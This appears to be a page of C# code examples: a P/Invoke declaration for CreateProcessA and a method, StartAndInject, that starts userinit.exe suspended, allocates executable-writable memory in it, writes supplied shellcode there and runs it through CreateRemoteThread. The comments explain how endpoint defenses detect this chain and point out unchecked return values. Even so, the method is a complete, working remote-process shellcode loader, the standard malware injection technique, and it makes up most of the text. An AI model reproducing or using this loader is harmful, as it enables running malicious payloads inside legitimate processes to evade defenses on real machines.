Esempio n. 1
    /// <summary>
    /// P/Invoke declaration for the Win32 <c>CreateProcessA</c> entry point.
    /// The <c>[DllImport]</c> attribute that binds it to kernel32 is outside this excerpt.
    /// </summary>
    /// <remarks>
    /// NOTE(review): the native function returns a BOOL success flag, so the
    /// <see cref="IntPtr"/> returned here is only a status value, never an address.
    /// <paramref name="lpStartupInfo"/> is marshalled in-only; <paramref name="lpProcessInformation"/>
    /// is an <c>out</c> struct that receives the new process/thread handles.
    /// </remarks>
    public static extern IntPtr CreateProcessA(String lpApplicationName, String lpCommandLine, Structs.SecurityAttributes lpProcessAttributes, Structs.SecurityAttributes lpThreadAttributes, Boolean bInheritHandles, Structs.CreateProcessFlags dwCreationFlags,
                                               IntPtr lpEnvironment,
                                               String lpCurrentDirectory,
                                               [In] Structs.StartupInfo lpStartupInfo,
                                               out Structs.ProcessInformation lpProcessInformation

                                               );
Esempio n. 2
    /// <summary>
    /// Spawns <c>C:\Windows\System32\userinit.exe</c> in a suspended state, allocates an
    /// executable+writable region inside it, copies <paramref name="shellcode"/> there and
    /// starts a remote thread at that address.
    /// </summary>
    /// <remarks>
    /// From a detection standpoint this is the textbook remote-injection chain that
    /// endpoint telemetry keys on: a suspended child process, a cross-process
    /// <c>VirtualAllocEx</c> with <c>PAGE_EXECUTE_READWRITE</c>, a cross-process
    /// <c>WriteProcessMemory</c>, then <c>CreateRemoteThread</c>. No return value in
    /// this method is checked, and the handles in <c>pInfo</c> are never closed, so the
    /// suspended child and the RWX region remain as artifacts after the call returns.
    /// </remarks>
    /// <param name="shellcode">Bytes copied into the target process; a null argument
    /// throws <see cref="NullReferenceException"/> at the <c>.Length</c> access.</param>
    public static void StartAndInject(byte[] shellcode)
    {
        // Target image name; resolved against System32 below.
        string binary = "userinit.exe";

        Int32 size = shellcode.Length;

        Structs.StartupInfo sInfo = new Structs.StartupInfo();


        sInfo.dwFlags = 0;
        Structs.ProcessInformation pInfo;

        // Hard-coded System32 path; not validated against the running Windows directory.
        string binaryPath = "C:\\Windows\\System32\\" + binary;

        // CREATE_SUSPENDED: the child never reaches its own entry point before the
        // remote thread is created. The return value (a success flag, despite the
        // variable name) is stored but never inspected.
        IntPtr funcAddr = WinAPI.CreateProcessA(binaryPath, null, null, null, true, Structs.CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
        IntPtr hProcess = pInfo.hProcess;


        // Cross-process allocation with RWX protection — the single strongest
        // indicator in this sequence for memory-scanning and API-hooking defenses.
        // MEM_COMMIT / PAGE_EXECUTE_READWRITE are defined elsewhere in the file.
        IntPtr spaceAddr = WinAPI.VirtualAllocEx(hProcess, new IntPtr(0), (uint)size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

        UIntPtr bytesWritten;
        IntPtr  size2  = new IntPtr(shellcode.Length);
        // bWrite and bytesWritten are assigned but never read; a short or failed
        // write goes unnoticed.
        bool    bWrite = WinAPI.WriteProcessMemory(hProcess, spaceAddr, shellcode, (uint)size2, out bytesWritten);

        // Thread start address is the freshly written region. The returned thread
        // handle is discarded; nothing below resumes or closes the child process.
        WinAPI.CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
    }